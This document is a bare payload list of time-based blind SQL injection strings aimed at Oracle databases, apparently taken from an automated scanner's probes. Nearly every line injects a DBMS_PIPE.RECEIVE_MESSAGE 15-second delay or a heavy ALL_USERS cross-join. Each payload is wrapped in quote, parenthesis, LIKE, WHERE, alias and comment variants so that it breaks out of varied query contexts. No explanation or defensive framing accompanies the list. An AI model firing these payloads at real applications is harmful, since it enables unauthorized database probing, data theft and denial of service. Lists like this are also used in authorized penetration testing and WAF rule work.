.'')".('()
'sRRZ<'">nxyK
) AND 6550=DBMS_PIPE.RECEIVE_MESSAGE(CHR(82)||CHR(107)||CHR(81)||CHR(109),15)
') AND 6550=DBMS_PIPE.RECEIVE_MESSAGE(CHR(82)||CHR(107)||CHR(81)||CHR(109),15)
' AND 6550=DBMS_PIPE.RECEIVE_MESSAGE(CHR(82)||CHR(107)||CHR(81)||CHR(109),15)
" AND 6550=DBMS_PIPE.RECEIVE_MESSAGE(CHR(82)||CHR(107)||CHR(81)||CHR(109),15)
) AND 6550=DBMS_PIPE.RECEIVE_MESSAGE(CHR(82)||CHR(107)||CHR(81)||CHR(109),15) AND (5787=5787
)) AND 6550=DBMS_PIPE.RECEIVE_MESSAGE(CHR(82)||CHR(107)||CHR(81)||CHR(109),15) AND ((7464=7464
))) AND 6550=DBMS_PIPE.RECEIVE_MESSAGE(CHR(82)||CHR(107)||CHR(81)||CHR(109),15) AND (((9458=9458
 AND 6550=DBMS_PIPE.RECEIVE_MESSAGE(CHR(82)||CHR(107)||CHR(81)||CHR(109),15)
') AND 6550=DBMS_PIPE.RECEIVE_MESSAGE(CHR(82)||CHR(107)||CHR(81)||CHR(109),15) AND ('ORfi'='ORfi
')) AND 6550=DBMS_PIPE.RECEIVE_MESSAGE(CHR(82)||CHR(107)||CHR(81)||CHR(109),15) AND (('faBR'='faBR
'))) AND 6550=DBMS_PIPE.RECEIVE_MESSAGE(CHR(82)||CHR(107)||CHR(81)||CHR(109),15) AND ((('PGeT'='PGeT
' AND 6550=DBMS_PIPE.RECEIVE_MESSAGE(CHR(82)||CHR(107)||CHR(81)||CHR(109),15) AND 'FGIl'='FGIl
') AND 6550=DBMS_PIPE.RECEIVE_MESSAGE(CHR(82)||CHR(107)||CHR(81)||CHR(109),15) AND ('xPBW' LIKE 'xPBW
')) AND 6550=DBMS_PIPE.RECEIVE_MESSAGE(CHR(82)||CHR(107)||CHR(81)||CHR(109),15) AND (('wzPb' LIKE 'wzPb
'))) AND 6550=DBMS_PIPE.RECEIVE_MESSAGE(CHR(82)||CHR(107)||CHR(81)||CHR(109),15) AND ((('mshI' LIKE 'mshI
' AND 6550=DBMS_PIPE.RECEIVE_MESSAGE(CHR(82)||CHR(107)||CHR(81)||CHR(109),15) AND 'UhPi' LIKE 'UhPi
") AND 6550=DBMS_PIPE.RECEIVE_MESSAGE(CHR(82)||CHR(107)||CHR(81)||CHR(109),15) AND ("FEaW"="FEaW
")) AND 6550=DBMS_PIPE.RECEIVE_MESSAGE(CHR(82)||CHR(107)||CHR(81)||CHR(109),15) AND (("SoVt"="SoVt
"))) AND 6550=DBMS_PIPE.RECEIVE_MESSAGE(CHR(82)||CHR(107)||CHR(81)||CHR(109),15) AND ((("sjfw"="sjfw
" AND 6550=DBMS_PIPE.RECEIVE_MESSAGE(CHR(82)||CHR(107)||CHR(81)||CHR(109),15) AND "BbFU"="BbFU
") AND 6550=DBMS_PIPE.RECEIVE_MESSAGE(CHR(82)||CHR(107)||CHR(81)||CHR(109),15) AND ("ONjA" LIKE "ONjA
")) AND 6550=DBMS_PIPE.RECEIVE_MESSAGE(CHR(82)||CHR(107)||CHR(81)||CHR(109),15) AND (("lKoP" LIKE "lKoP
"))) AND 6550=DBMS_PIPE.RECEIVE_MESSAGE(CHR(82)||CHR(107)||CHR(81)||CHR(109),15) AND ((("wNkU" LIKE "wNkU
" AND 6550=DBMS_PIPE.RECEIVE_MESSAGE(CHR(82)||CHR(107)||CHR(81)||CHR(109),15) AND "eRAA" LIKE "eRAA
%') AND 6550=DBMS_PIPE.RECEIVE_MESSAGE(CHR(82)||CHR(107)||CHR(81)||CHR(109),15) AND ('%'='
%')) AND 6550=DBMS_PIPE.RECEIVE_MESSAGE(CHR(82)||CHR(107)||CHR(81)||CHR(109),15) AND (('%'='
%'))) AND 6550=DBMS_PIPE.RECEIVE_MESSAGE(CHR(82)||CHR(107)||CHR(81)||CHR(109),15) AND ((('%'='
%' AND 6550=DBMS_PIPE.RECEIVE_MESSAGE(CHR(82)||CHR(107)||CHR(81)||CHR(109),15) AND '%'='
%") AND 6550=DBMS_PIPE.RECEIVE_MESSAGE(CHR(82)||CHR(107)||CHR(81)||CHR(109),15) AND ("%"="
%")) AND 6550=DBMS_PIPE.RECEIVE_MESSAGE(CHR(82)||CHR(107)||CHR(81)||CHR(109),15) AND (("%"="
%"))) AND 6550=DBMS_PIPE.RECEIVE_MESSAGE(CHR(82)||CHR(107)||CHR(81)||CHR(109),15) AND ((("%"="
%" AND 6550=DBMS_PIPE.RECEIVE_MESSAGE(CHR(82)||CHR(107)||CHR(81)||CHR(109),15) AND "%"="
%00') AND 6550=DBMS_PIPE.RECEIVE_MESSAGE(CHR(82)||CHR(107)||CHR(81)||CHR(109),15) AND ('OYWm'='OYWm
%00')) AND 6550=DBMS_PIPE.RECEIVE_MESSAGE(CHR(82)||CHR(107)||CHR(81)||CHR(109),15) AND (('BsHt'='BsHt
%00'))) AND 6550=DBMS_PIPE.RECEIVE_MESSAGE(CHR(82)||CHR(107)||CHR(81)||CHR(109),15) AND ((('QEFr'='QEFr
%00' AND 6550=DBMS_PIPE.RECEIVE_MESSAGE(CHR(82)||CHR(107)||CHR(81)||CHR(109),15) AND 'Phvz'='Phvz
 AND 6550=DBMS_PIPE.RECEIVE_MESSAGE(CHR(82)||CHR(107)||CHR(81)||CHR(109),15)-- TYOW
 AND 6550=DBMS_PIPE.RECEIVE_MESSAGE(CHR(82)||CHR(107)||CHR(81)||CHR(109),15)# GpzC
') WHERE 6680=6680 AND 6550=DBMS_PIPE.RECEIVE_MESSAGE(CHR(82)||CHR(107)||CHR(81)||CHR(109),15)-- 
") WHERE 2354=2354 AND 6550=DBMS_PIPE.RECEIVE_MESSAGE(CHR(82)||CHR(107)||CHR(81)||CHR(109),15)-- 
) WHERE 7247=7247 AND 6550=DBMS_PIPE.RECEIVE_MESSAGE(CHR(82)||CHR(107)||CHR(81)||CHR(109),15)-- 
' WHERE 9496=9496 AND 6550=DBMS_PIPE.RECEIVE_MESSAGE(CHR(82)||CHR(107)||CHR(81)||CHR(109),15)-- 
" WHERE 5629=5629 AND 6550=DBMS_PIPE.RECEIVE_MESSAGE(CHR(82)||CHR(107)||CHR(81)||CHR(109),15)-- 
 WHERE 9252=9252 AND 6550=DBMS_PIPE.RECEIVE_MESSAGE(CHR(82)||CHR(107)||CHR(81)||CHR(109),15)-- 
')) AS sFrQ WHERE 7025=7025 AND 6550=DBMS_PIPE.RECEIVE_MESSAGE(CHR(82)||CHR(107)||CHR(81)||CHR(109),15)-- 
")) AS vyrd WHERE 1133=1133 AND 6550=DBMS_PIPE.RECEIVE_MESSAGE(CHR(82)||CHR(107)||CHR(81)||CHR(109),15)-- 
)) AS GGlP WHERE 7532=7532 AND 6550=DBMS_PIPE.RECEIVE_MESSAGE(CHR(82)||CHR(107)||CHR(81)||CHR(109),15)-- 
') AS yEWE WHERE 8434=8434 AND 6550=DBMS_PIPE.RECEIVE_MESSAGE(CHR(82)||CHR(107)||CHR(81)||CHR(109),15)-- 
") AS HFlJ WHERE 4039=4039 AND 6550=DBMS_PIPE.RECEIVE_MESSAGE(CHR(82)||CHR(107)||CHR(81)||CHR(109),15)-- 
) AS EIOA WHERE 2497=2497 AND 6550=DBMS_PIPE.RECEIVE_MESSAGE(CHR(82)||CHR(107)||CHR(81)||CHR(109),15)-- 
'||(SELECT 'UMJj' FROM DUAL WHERE 8427=8427 AND 6550=DBMS_PIPE.RECEIVE_MESSAGE(CHR(82)||CHR(107)||CHR(81)||CHR(109),15))||'
'||(SELECT 'TGvP' WHERE 4622=4622 AND 6550=DBMS_PIPE.RECEIVE_MESSAGE(CHR(82)||CHR(107)||CHR(81)||CHR(109),15))||'
'+(SELECT BiIw WHERE 4897=4897 AND 6550=DBMS_PIPE.RECEIVE_MESSAGE(CHR(82)||CHR(107)||CHR(81)||CHR(109),15))+'
'+(SELECT 'NjaK' WHERE 1404=1404 AND 6550=DBMS_PIPE.RECEIVE_MESSAGE(CHR(82)||CHR(107)||CHR(81)||CHR(109),15))+'
' IN BOOLEAN MODE) AND 6550=DBMS_PIPE.RECEIVE_MESSAGE(CHR(82)||CHR(107)||CHR(81)||CHR(109),15)#
) OR 3105=DBMS_PIPE.RECEIVE_MESSAGE(CHR(66)||CHR(117)||CHR(119)||CHR(105),15)
') OR 3105=DBMS_PIPE.RECEIVE_MESSAGE(CHR(66)||CHR(117)||CHR(119)||CHR(105),15)
' OR 3105=DBMS_PIPE.RECEIVE_MESSAGE(CHR(66)||CHR(117)||CHR(119)||CHR(105),15)
" OR 3105=DBMS_PIPE.RECEIVE_MESSAGE(CHR(66)||CHR(117)||CHR(119)||CHR(105),15)
) OR 3105=DBMS_PIPE.RECEIVE_MESSAGE(CHR(66)||CHR(117)||CHR(119)||CHR(105),15) AND (8800=8800
)) OR 3105=DBMS_PIPE.RECEIVE_MESSAGE(CHR(66)||CHR(117)||CHR(119)||CHR(105),15) AND ((1471=1471
))) OR 3105=DBMS_PIPE.RECEIVE_MESSAGE(CHR(66)||CHR(117)||CHR(119)||CHR(105),15) AND (((2746=2746
 OR 3105=DBMS_PIPE.RECEIVE_MESSAGE(CHR(66)||CHR(117)||CHR(119)||CHR(105),15)
') OR 3105=DBMS_PIPE.RECEIVE_MESSAGE(CHR(66)||CHR(117)||CHR(119)||CHR(105),15) AND ('Tvzw'='Tvzw
')) OR 3105=DBMS_PIPE.RECEIVE_MESSAGE(CHR(66)||CHR(117)||CHR(119)||CHR(105),15) AND (('RUlB'='RUlB
'))) OR 3105=DBMS_PIPE.RECEIVE_MESSAGE(CHR(66)||CHR(117)||CHR(119)||CHR(105),15) AND ((('FqPe'='FqPe
' OR 3105=DBMS_PIPE.RECEIVE_MESSAGE(CHR(66)||CHR(117)||CHR(119)||CHR(105),15) AND 'ATFO'='ATFO
') OR 3105=DBMS_PIPE.RECEIVE_MESSAGE(CHR(66)||CHR(117)||CHR(119)||CHR(105),15) AND ('JdiJ' LIKE 'JdiJ
')) OR 3105=DBMS_PIPE.RECEIVE_MESSAGE(CHR(66)||CHR(117)||CHR(119)||CHR(105),15) AND (('qMib' LIKE 'qMib
'))) OR 3105=DBMS_PIPE.RECEIVE_MESSAGE(CHR(66)||CHR(117)||CHR(119)||CHR(105),15) AND ((('tCvI' LIKE 'tCvI
' OR 3105=DBMS_PIPE.RECEIVE_MESSAGE(CHR(66)||CHR(117)||CHR(119)||CHR(105),15) AND 'QIts' LIKE 'QIts
") OR 3105=DBMS_PIPE.RECEIVE_MESSAGE(CHR(66)||CHR(117)||CHR(119)||CHR(105),15) AND ("FpDo"="FpDo
")) OR 3105=DBMS_PIPE.RECEIVE_MESSAGE(CHR(66)||CHR(117)||CHR(119)||CHR(105),15) AND (("HyTo"="HyTo
"))) OR 3105=DBMS_PIPE.RECEIVE_MESSAGE(CHR(66)||CHR(117)||CHR(119)||CHR(105),15) AND ((("MMCK"="MMCK
" OR 3105=DBMS_PIPE.RECEIVE_MESSAGE(CHR(66)||CHR(117)||CHR(119)||CHR(105),15) AND "wtfU"="wtfU
") OR 3105=DBMS_PIPE.RECEIVE_MESSAGE(CHR(66)||CHR(117)||CHR(119)||CHR(105),15) AND ("Zqwu" LIKE "Zqwu
")) OR 3105=DBMS_PIPE.RECEIVE_MESSAGE(CHR(66)||CHR(117)||CHR(119)||CHR(105),15) AND (("PMOv" LIKE "PMOv
"))) OR 3105=DBMS_PIPE.RECEIVE_MESSAGE(CHR(66)||CHR(117)||CHR(119)||CHR(105),15) AND ((("LLEt" LIKE "LLEt
" OR 3105=DBMS_PIPE.RECEIVE_MESSAGE(CHR(66)||CHR(117)||CHR(119)||CHR(105),15) AND "Agjg" LIKE "Agjg
%') OR 3105=DBMS_PIPE.RECEIVE_MESSAGE(CHR(66)||CHR(117)||CHR(119)||CHR(105),15) AND ('%'='
%')) OR 3105=DBMS_PIPE.RECEIVE_MESSAGE(CHR(66)||CHR(117)||CHR(119)||CHR(105),15) AND (('%'='
%'))) OR 3105=DBMS_PIPE.RECEIVE_MESSAGE(CHR(66)||CHR(117)||CHR(119)||CHR(105),15) AND ((('%'='
%' OR 3105=DBMS_PIPE.RECEIVE_MESSAGE(CHR(66)||CHR(117)||CHR(119)||CHR(105),15) AND '%'='
%") OR 3105=DBMS_PIPE.RECEIVE_MESSAGE(CHR(66)||CHR(117)||CHR(119)||CHR(105),15) AND ("%"="
%")) OR 3105=DBMS_PIPE.RECEIVE_MESSAGE(CHR(66)||CHR(117)||CHR(119)||CHR(105),15) AND (("%"="
%"))) OR 3105=DBMS_PIPE.RECEIVE_MESSAGE(CHR(66)||CHR(117)||CHR(119)||CHR(105),15) AND ((("%"="
%" OR 3105=DBMS_PIPE.RECEIVE_MESSAGE(CHR(66)||CHR(117)||CHR(119)||CHR(105),15) AND "%"="
%00') OR 3105=DBMS_PIPE.RECEIVE_MESSAGE(CHR(66)||CHR(117)||CHR(119)||CHR(105),15) AND ('xVGu'='xVGu
%00')) OR 3105=DBMS_PIPE.RECEIVE_MESSAGE(CHR(66)||CHR(117)||CHR(119)||CHR(105),15) AND (('pult'='pult
%00'))) OR 3105=DBMS_PIPE.RECEIVE_MESSAGE(CHR(66)||CHR(117)||CHR(119)||CHR(105),15) AND ((('Vwzz'='Vwzz
%00' OR 3105=DBMS_PIPE.RECEIVE_MESSAGE(CHR(66)||CHR(117)||CHR(119)||CHR(105),15) AND 'KIUX'='KIUX
 OR 3105=DBMS_PIPE.RECEIVE_MESSAGE(CHR(66)||CHR(117)||CHR(119)||CHR(105),15)-- KyNL
 OR 3105=DBMS_PIPE.RECEIVE_MESSAGE(CHR(66)||CHR(117)||CHR(119)||CHR(105),15)# vVXD
') WHERE 3330=3330 OR 3105=DBMS_PIPE.RECEIVE_MESSAGE(CHR(66)||CHR(117)||CHR(119)||CHR(105),15)-- 
") WHERE 9554=9554 OR 3105=DBMS_PIPE.RECEIVE_MESSAGE(CHR(66)||CHR(117)||CHR(119)||CHR(105),15)-- 
) WHERE 2785=2785 OR 3105=DBMS_PIPE.RECEIVE_MESSAGE(CHR(66)||CHR(117)||CHR(119)||CHR(105),15)-- 
' WHERE 1576=1576 OR 3105=DBMS_PIPE.RECEIVE_MESSAGE(CHR(66)||CHR(117)||CHR(119)||CHR(105),15)-- 
" WHERE 9833=9833 OR 3105=DBMS_PIPE.RECEIVE_MESSAGE(CHR(66)||CHR(117)||CHR(119)||CHR(105),15)-- 
 WHERE 6949=6949 OR 3105=DBMS_PIPE.RECEIVE_MESSAGE(CHR(66)||CHR(117)||CHR(119)||CHR(105),15)-- 
')) AS oxUZ WHERE 7419=7419 OR 3105=DBMS_PIPE.RECEIVE_MESSAGE(CHR(66)||CHR(117)||CHR(119)||CHR(105),15)-- 
")) AS olWA WHERE 8511=8511 OR 3105=DBMS_PIPE.RECEIVE_MESSAGE(CHR(66)||CHR(117)||CHR(119)||CHR(105),15)-- 
)) AS YDkm WHERE 6524=6524 OR 3105=DBMS_PIPE.RECEIVE_MESSAGE(CHR(66)||CHR(117)||CHR(119)||CHR(105),15)-- 
') AS Lqcj WHERE 8325=8325 OR 3105=DBMS_PIPE.RECEIVE_MESSAGE(CHR(66)||CHR(117)||CHR(119)||CHR(105),15)-- 
") AS VHhB WHERE 1805=1805 OR 3105=DBMS_PIPE.RECEIVE_MESSAGE(CHR(66)||CHR(117)||CHR(119)||CHR(105),15)-- 
) AS coFi WHERE 1713=1713 OR 3105=DBMS_PIPE.RECEIVE_MESSAGE(CHR(66)||CHR(117)||CHR(119)||CHR(105),15)-- 
'||(SELECT 'fjGS' FROM DUAL WHERE 6214=6214 OR 3105=DBMS_PIPE.RECEIVE_MESSAGE(CHR(66)||CHR(117)||CHR(119)||CHR(105),15))||'
'||(SELECT 'GnKG' WHERE 8865=8865 OR 3105=DBMS_PIPE.RECEIVE_MESSAGE(CHR(66)||CHR(117)||CHR(119)||CHR(105),15))||'
'+(SELECT wmTS WHERE 7823=7823 OR 3105=DBMS_PIPE.RECEIVE_MESSAGE(CHR(66)||CHR(117)||CHR(119)||CHR(105),15))+'
'+(SELECT 'DEaz' WHERE 8380=8380 OR 3105=DBMS_PIPE.RECEIVE_MESSAGE(CHR(66)||CHR(117)||CHR(119)||CHR(105),15))+'
' IN BOOLEAN MODE) OR 3105=DBMS_PIPE.RECEIVE_MESSAGE(CHR(66)||CHR(117)||CHR(119)||CHR(105),15)#
) AND 5090=DBMS_PIPE.RECEIVE_MESSAGE(CHR(90)||CHR(67)||CHR(67)||CHR(114),15)--
') AND 5090=DBMS_PIPE.RECEIVE_MESSAGE(CHR(90)||CHR(67)||CHR(67)||CHR(114),15)--
' AND 5090=DBMS_PIPE.RECEIVE_MESSAGE(CHR(90)||CHR(67)||CHR(67)||CHR(114),15)--
" AND 5090=DBMS_PIPE.RECEIVE_MESSAGE(CHR(90)||CHR(67)||CHR(67)||CHR(114),15)--
)) AND 5090=DBMS_PIPE.RECEIVE_MESSAGE(CHR(90)||CHR(67)||CHR(67)||CHR(114),15)--
))) AND 5090=DBMS_PIPE.RECEIVE_MESSAGE(CHR(90)||CHR(67)||CHR(67)||CHR(114),15)--
 AND 5090=DBMS_PIPE.RECEIVE_MESSAGE(CHR(90)||CHR(67)||CHR(67)||CHR(114),15)--
')) AND 5090=DBMS_PIPE.RECEIVE_MESSAGE(CHR(90)||CHR(67)||CHR(67)||CHR(114),15)--
'))) AND 5090=DBMS_PIPE.RECEIVE_MESSAGE(CHR(90)||CHR(67)||CHR(67)||CHR(114),15)--
") AND 5090=DBMS_PIPE.RECEIVE_MESSAGE(CHR(90)||CHR(67)||CHR(67)||CHR(114),15)--
")) AND 5090=DBMS_PIPE.RECEIVE_MESSAGE(CHR(90)||CHR(67)||CHR(67)||CHR(114),15)--
"))) AND 5090=DBMS_PIPE.RECEIVE_MESSAGE(CHR(90)||CHR(67)||CHR(67)||CHR(114),15)--
%') AND 5090=DBMS_PIPE.RECEIVE_MESSAGE(CHR(90)||CHR(67)||CHR(67)||CHR(114),15)--
%')) AND 5090=DBMS_PIPE.RECEIVE_MESSAGE(CHR(90)||CHR(67)||CHR(67)||CHR(114),15)--
%'))) AND 5090=DBMS_PIPE.RECEIVE_MESSAGE(CHR(90)||CHR(67)||CHR(67)||CHR(114),15)--
%' AND 5090=DBMS_PIPE.RECEIVE_MESSAGE(CHR(90)||CHR(67)||CHR(67)||CHR(114),15)--
%") AND 5090=DBMS_PIPE.RECEIVE_MESSAGE(CHR(90)||CHR(67)||CHR(67)||CHR(114),15)--
%")) AND 5090=DBMS_PIPE.RECEIVE_MESSAGE(CHR(90)||CHR(67)||CHR(67)||CHR(114),15)--
%"))) AND 5090=DBMS_PIPE.RECEIVE_MESSAGE(CHR(90)||CHR(67)||CHR(67)||CHR(114),15)--
%" AND 5090=DBMS_PIPE.RECEIVE_MESSAGE(CHR(90)||CHR(67)||CHR(67)||CHR(114),15)--
%00') AND 5090=DBMS_PIPE.RECEIVE_MESSAGE(CHR(90)||CHR(67)||CHR(67)||CHR(114),15)--
%00')) AND 5090=DBMS_PIPE.RECEIVE_MESSAGE(CHR(90)||CHR(67)||CHR(67)||CHR(114),15)--
%00'))) AND 5090=DBMS_PIPE.RECEIVE_MESSAGE(CHR(90)||CHR(67)||CHR(67)||CHR(114),15)--
%00' AND 5090=DBMS_PIPE.RECEIVE_MESSAGE(CHR(90)||CHR(67)||CHR(67)||CHR(114),15)--
') WHERE 2000=2000 AND 5090=DBMS_PIPE.RECEIVE_MESSAGE(CHR(90)||CHR(67)||CHR(67)||CHR(114),15)--
") WHERE 7837=7837 AND 5090=DBMS_PIPE.RECEIVE_MESSAGE(CHR(90)||CHR(67)||CHR(67)||CHR(114),15)--
) WHERE 6696=6696 AND 5090=DBMS_PIPE.RECEIVE_MESSAGE(CHR(90)||CHR(67)||CHR(67)||CHR(114),15)--
' WHERE 9028=9028 AND 5090=DBMS_PIPE.RECEIVE_MESSAGE(CHR(90)||CHR(67)||CHR(67)||CHR(114),15)--
" WHERE 3400=3400 AND 5090=DBMS_PIPE.RECEIVE_MESSAGE(CHR(90)||CHR(67)||CHR(67)||CHR(114),15)--
 WHERE 9131=9131 AND 5090=DBMS_PIPE.RECEIVE_MESSAGE(CHR(90)||CHR(67)||CHR(67)||CHR(114),15)--
')) AS jbBp WHERE 2191=2191 AND 5090=DBMS_PIPE.RECEIVE_MESSAGE(CHR(90)||CHR(67)||CHR(67)||CHR(114),15)--
")) AS ATle WHERE 5023=5023 AND 5090=DBMS_PIPE.RECEIVE_MESSAGE(CHR(90)||CHR(67)||CHR(67)||CHR(114),15)--
)) AS tYbS WHERE 7491=7491 AND 5090=DBMS_PIPE.RECEIVE_MESSAGE(CHR(90)||CHR(67)||CHR(67)||CHR(114),15)--
') AS rXnA WHERE 3973=3973 AND 5090=DBMS_PIPE.RECEIVE_MESSAGE(CHR(90)||CHR(67)||CHR(67)||CHR(114),15)--
") AS emsP WHERE 5469=5469 AND 5090=DBMS_PIPE.RECEIVE_MESSAGE(CHR(90)||CHR(67)||CHR(67)||CHR(114),15)--
) AS FCnB WHERE 6960=6960 AND 5090=DBMS_PIPE.RECEIVE_MESSAGE(CHR(90)||CHR(67)||CHR(67)||CHR(114),15)--
'||(SELECT 'EMYw' FROM DUAL WHERE 2476=2476 AND 5090=DBMS_PIPE.RECEIVE_MESSAGE(CHR(90)||CHR(67)||CHR(67)||CHR(114),15)--
'||(SELECT 'kKUh' WHERE 1096=1096 AND 5090=DBMS_PIPE.RECEIVE_MESSAGE(CHR(90)||CHR(67)||CHR(67)||CHR(114),15)--
'+(SELECT wptk WHERE 3577=3577 AND 5090=DBMS_PIPE.RECEIVE_MESSAGE(CHR(90)||CHR(67)||CHR(67)||CHR(114),15)--
'+(SELECT 'WQRl' WHERE 9477=9477 AND 5090=DBMS_PIPE.RECEIVE_MESSAGE(CHR(90)||CHR(67)||CHR(67)||CHR(114),15)--
' IN BOOLEAN MODE) AND 5090=DBMS_PIPE.RECEIVE_MESSAGE(CHR(90)||CHR(67)||CHR(67)||CHR(114),15)--
) OR 6590=DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(79)||CHR(102)||CHR(117),15)--
') OR 6590=DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(79)||CHR(102)||CHR(117),15)--
' OR 6590=DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(79)||CHR(102)||CHR(117),15)--
" OR 6590=DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(79)||CHR(102)||CHR(117),15)--
)) OR 6590=DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(79)||CHR(102)||CHR(117),15)--
))) OR 6590=DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(79)||CHR(102)||CHR(117),15)--
 OR 6590=DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(79)||CHR(102)||CHR(117),15)--
')) OR 6590=DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(79)||CHR(102)||CHR(117),15)--
'))) OR 6590=DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(79)||CHR(102)||CHR(117),15)--
") OR 6590=DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(79)||CHR(102)||CHR(117),15)--
")) OR 6590=DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(79)||CHR(102)||CHR(117),15)--
"))) OR 6590=DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(79)||CHR(102)||CHR(117),15)--
%') OR 6590=DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(79)||CHR(102)||CHR(117),15)--
%')) OR 6590=DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(79)||CHR(102)||CHR(117),15)--
%'))) OR 6590=DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(79)||CHR(102)||CHR(117),15)--
%' OR 6590=DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(79)||CHR(102)||CHR(117),15)--
%") OR 6590=DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(79)||CHR(102)||CHR(117),15)--
%")) OR 6590=DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(79)||CHR(102)||CHR(117),15)--
%"))) OR 6590=DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(79)||CHR(102)||CHR(117),15)--
%" OR 6590=DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(79)||CHR(102)||CHR(117),15)--
%00') OR 6590=DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(79)||CHR(102)||CHR(117),15)--
%00')) OR 6590=DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(79)||CHR(102)||CHR(117),15)--
%00'))) OR 6590=DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(79)||CHR(102)||CHR(117),15)--
%00' OR 6590=DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(79)||CHR(102)||CHR(117),15)--
') WHERE 2120=2120 OR 6590=DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(79)||CHR(102)||CHR(117),15)--
") WHERE 1578=1578 OR 6590=DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(79)||CHR(102)||CHR(117),15)--
) WHERE 8539=8539 OR 6590=DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(79)||CHR(102)||CHR(117),15)--
' WHERE 8909=8909 OR 6590=DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(79)||CHR(102)||CHR(117),15)--
" WHERE 1174=1174 OR 6590=DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(79)||CHR(102)||CHR(117),15)--
 WHERE 9004=9004 OR 6590=DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(79)||CHR(102)||CHR(117),15)--
')) AS ECbG WHERE 8432=8432 OR 6590=DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(79)||CHR(102)||CHR(117),15)--
")) AS LFez WHERE 5632=5632 OR 6590=DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(79)||CHR(102)||CHR(117),15)--
)) AS pwZT WHERE 4416=4416 OR 6590=DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(79)||CHR(102)||CHR(117),15)--
') AS RWux WHERE 5518=5518 OR 6590=DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(79)||CHR(102)||CHR(117),15)--
") AS wLKW WHERE 3337=3337 OR 6590=DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(79)||CHR(102)||CHR(117),15)--
) AS BMku WHERE 3124=3124 OR 6590=DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(79)||CHR(102)||CHR(117),15)--
'||(SELECT 'dhuA' FROM DUAL WHERE 5966=5966 OR 6590=DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(79)||CHR(102)||CHR(117),15)--
'||(SELECT 'AcAr' WHERE 9292=9292 OR 6590=DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(79)||CHR(102)||CHR(117),15)--
'+(SELECT xcvh WHERE 4214=4214 OR 6590=DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(79)||CHR(102)||CHR(117),15)--
'+(SELECT 'ZSlR' WHERE 9657=9657 OR 6590=DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(79)||CHR(102)||CHR(117),15)--
' IN BOOLEAN MODE) OR 6590=DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(79)||CHR(102)||CHR(117),15)--
) AND 5687=(SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5)
') AND 5687=(SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5)
' AND 5687=(SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5)
" AND 5687=(SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5)
) AND 5687=(SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5) AND (7821=7821
)) AND 5687=(SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5) AND ((6548=6548
))) AND 5687=(SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5) AND (((2412=2412
 AND 5687=(SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5)
') AND 5687=(SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5) AND ('YcMN'='YcMN
')) AND 5687=(SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5) AND (('JrLd'='JrLd
'))) AND 5687=(SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5) AND ((('QECI'='QECI
' AND 5687=(SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5) AND 'Jzif'='Jzif
